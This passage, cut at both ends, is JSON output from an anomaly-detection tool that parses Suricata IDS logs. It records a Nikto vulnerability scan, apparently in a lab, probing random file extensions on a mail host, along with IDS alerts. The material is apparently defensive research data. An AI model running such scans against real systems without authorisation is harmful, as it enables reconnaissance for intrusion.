"{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80", "/parser/model/time": 1583349514.194298, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46806, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.194537, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", 
"/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 
3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46806, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2223921164907347, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", 
"AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80", "/parser/model/time": 1583349514.197206, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46808, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", 
"AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tcl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.19741, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":728237458783181,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46808, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":728237458783181,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 728237458783181, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80", "/parser/model/time": 1583349514.199492, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46810, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sys", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.199703+0000\",\"flow_id\":1995991545415704,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.199703, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1995991545415704,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": 
"fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46810,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sys\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sys\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sys\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sys", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", 